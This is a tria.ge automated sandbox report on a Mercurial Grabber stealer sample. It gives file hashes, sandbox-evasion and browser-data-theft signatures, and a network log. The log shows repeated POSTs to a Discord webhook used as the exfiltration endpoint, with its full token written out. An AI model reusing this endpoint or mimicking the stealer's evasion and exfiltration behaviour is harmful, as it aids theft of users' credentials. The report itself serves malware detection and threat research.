Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

0f243aa3dc...18.exe

windows7-x64

10

0f243aa3dc...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/03/2024, 20:17 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe

  • Size

    41KB

  • MD5

    0f243aa3dcd8c33124e3fa9d3d12c343

  • SHA1

    7ae66af8676fc184ae800a5c6f46ce3943655fa1

  • SHA256

    f514711a78d01f9701310ae3ef72d7dcd78518a4ef355079349c6d3ce7d1cf39

  • SHA512

    eee55390d27109d434f92e3f4c719a30920f0d843ceb36eedde29744fdfbe5e4c97472901da626f9d5d4ea8a5f6405e54ddb32bc6e70f4dfbc023786addc0606

  • SSDEEP

    768:0scG4ApfT6ahzpDXswIuZkeNWTj0KZKfgm3Ehkl:bcKfnhz8eNWTIF7EWl

Score
10/10
mercurialgrabberevasionspywarestealer

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

Signatures

  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

    stealermercurialgrabber
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe"
    1⤵
    • Looks for VirtualBox Guest Additions in registry
    • Looks for VMWare Tools registry key
    • Checks BIOS information in registry
    • Maps connected drives based on registry
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    PID:4428

Network

  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ip4.seeip.org
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip4.seeip.org
    IN A
    Response
    ip4.seeip.org
    IN A
    23.128.64.141
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0lgwllnwnet
  • flag-us
    DNS
    2.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ip-api.com
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com//json/
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    208.95.112.1:80
    Request
    GET //json/ HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 28 Mar 2024 20:17:37 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 302
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    discord.com
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.128.233
    discord.com
    IN A
    162.159.136.232
    discord.com
    IN A
    162.159.135.232
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 441
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:38 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=38e5f398ed4011ee8dd39ac2721eb6c2; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1711657059
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OF5XydyMv6Y504vZm%2BJKoItq37JWmCTRmiNcHlbwXqeSjstv1EWqRgvzdzlZOBN%2FokzqjCy%2FT9DitfEq5pOPPXS5NJkRKti8j4h7AlekbyKU0oVNthDo7nPOo3nI"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=38e5f398ed4011ee8dd39ac2721eb6c252286f1585bfa7cf621658610747c447b4c79b418a2a8f54faca6698b99dc7eb; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=0b90a9d0d585da427664ed71b7e2f56a60c5e8c5-1711657058; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=w8BQdbUXIs17JFGXM3TBWffDWfz_jIuRQqhHKG_P7_Q-1711657058388-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e061f3694b1-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 315
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:38 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=39019a76ed4011eebf71f2b9a0a04292; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1711657060
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSWzGRVRMuJx3PGR8RjiUmtWzjqGypyx5VsaL7Rilgq%2F5K%2FnCageu0%2Fd47F4RuZ0y86zC3Ok5QOwAYBVHPTM9o%2F8ElTggr55Zdd5YHEpiVU89Xn5mfzlvUuMJbQn"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=39019a76ed4011eebf71f2b9a0a042922bfb1ed3e0a9af21abd5f7839c130de5962f0fd545f996955982115d2e37b378; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=0b90a9d0d585da427664ed71b7e2f56a60c5e8c5-1711657058; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=W21S.rKJiQCyyWtmFZTLTKaYocjeb5DZHTEOqglwdDg-1711657058564-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e07391694b1-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 745
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:39 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=39682c78ed4011ee82bc1e4bfad1ce74; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1711657060
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8vdyizVb8pqcYZ4qm8563sO%2B3lJsGPELMJ6NcPNOHTZw0HJmOhNd6kBzyyu7PFpuVzYTtSQojlGxj5verhtq9RPX7KwlB43amPNiBb677VZCteT0%2BtexkKw%2BVHw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=39682c78ed4011ee82bc1e4bfad1ce74ffddf152476fb8aec78b887916f9cd91bcf035e713f4e180e79d4726c012ba4b; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=bec68b89d56816841f41de6decf9bec5b689d633-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=KJHNInhHwiMTsYCiv4rF9_Qs9zTWtx13CkHhFMrAesQ-1711657059236-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e0acd8b94b1-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------e1bc0d13e8c946b48657b2be3059e73d
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
    Host: discord.com
    Content-Length: 662
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:39 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=39afcccced4011eeaaf1a6d52251bd1b; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1711657061
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=shzJZp1Bc61otyaWUGk2XzRwDLWqOoXP3tK2cWqEDz2HtPSY7pBmHmuzjBGpkAu3oVAvAGOLxaaxLYCQY7MzgXUw6z34%2Fy8cF%2FOhhYVSbiqBjno1O%2BU175v0yTpc"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=39afcccced4011eeaaf1a6d52251bd1be31d75cedd1bf31123e7eebe2673ab8d15a8043ab8a142b94f3a5bf3d5158957; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=065162e3738cb4cc3aef21e298aca63710313d67-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=KHgQ_I7PmYT1bLaXKUBxKKKrFzxpFW6cG6Fj80GzmVk-1711657059705-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e0e2aa194b1-LHR
  • flag-us
    DNS
    141.64.128.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    141.64.128.23.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    232.138.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.138.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: discord.com
    Content-Length: 196
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:39 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=398bc26eed4011ee81f2da06b9926043; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1711657060
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRuZfaumJlt2wB3cMfc%2FDa26axrKvT2WJMElLw%2FKEtZOR9olQOfXz2JDU9PRk5FpCX5sBnlUhc%2FTKjO26wgiTziAs3VEFHQTeDyyWIX4iuG6RoWoje8vP3V0%2FiC5"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=398bc26eed4011ee81f2da06b99260438f51fbb062bbdb713f960e0bf39472ffc69e9a28b0314b8a1566c703f0beba78; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=bec68b89d56816841f41de6decf9bec5b689d633-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=VxN29yt3aKP_QcoFEMQbSj20vYAOaIvFRporr9CrRYs-1711657059467-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e0cbca0654b-LHR
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.11.19.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.11.19.2.in-addr.arpa
    IN PTR
    Response
    8.11.19.2.in-addr.arpa
    IN PTR
    a2-19-11-8deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    27.73.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    27.73.42.20.in-addr.arpa
    IN PTR
    Response
  • 23.128.64.141:443
    ip4.seeip.org
    tls
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    826 B
     5.0kB
     12
    9
  • 208.95.112.1:80
    http://ip-api.com//json/
    http
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    296 B
     611 B
     5
    3

    HTTP Request

    GET http://ip-api.com//json/

    HTTP Response

    200
  • 162.159.138.232:443
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    tls, http
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    4.6kB
     10.8kB
     21
    28

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404
  • 162.159.138.232:443
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    tls, http
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    1.3kB
     2.2kB
     8
    9

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404
  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    ip4.seeip.org
    dns
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    59 B
     75 B
     1
    1

    DNS Request

    ip4.seeip.org

    DNS Response

    23.128.64.141

  • 8.8.8.8:53
    0.205.248.87.in-addr.arpa
    dns
    71 B
     116 B
     1
    1

    DNS Request

    0.205.248.87.in-addr.arpa

  • 8.8.8.8:53
    2.159.190.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    2.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    discord.com
    dns
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    57 B
     137 B
     1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.138.232
    162.159.137.232
    162.159.128.233
    162.159.136.232
    162.159.135.232

  • 8.8.8.8:53
    141.64.128.23.in-addr.arpa
    dns
    72 B
     140 B
     1
    1

    DNS Request

    141.64.128.23.in-addr.arpa

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
     95 B
     1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    232.138.159.162.in-addr.arpa
    dns
    74 B
     136 B
     1
    1

    DNS Request

    232.138.159.162.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    8.11.19.2.in-addr.arpa
    dns
    68 B
     129 B
     1
    1

    DNS Request

    8.11.19.2.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    27.73.42.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    27.73.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4428-0-0x0000000000C40000-0x0000000000C50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4428-1-0x00007FFB81160000-0x00007FFB81C21000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4428-2-0x0000000002F50000-0x0000000002F60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4428-8-0x00007FFB81160000-0x00007FFB81C21000-memory.dmp

    Filesize

    10.8MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.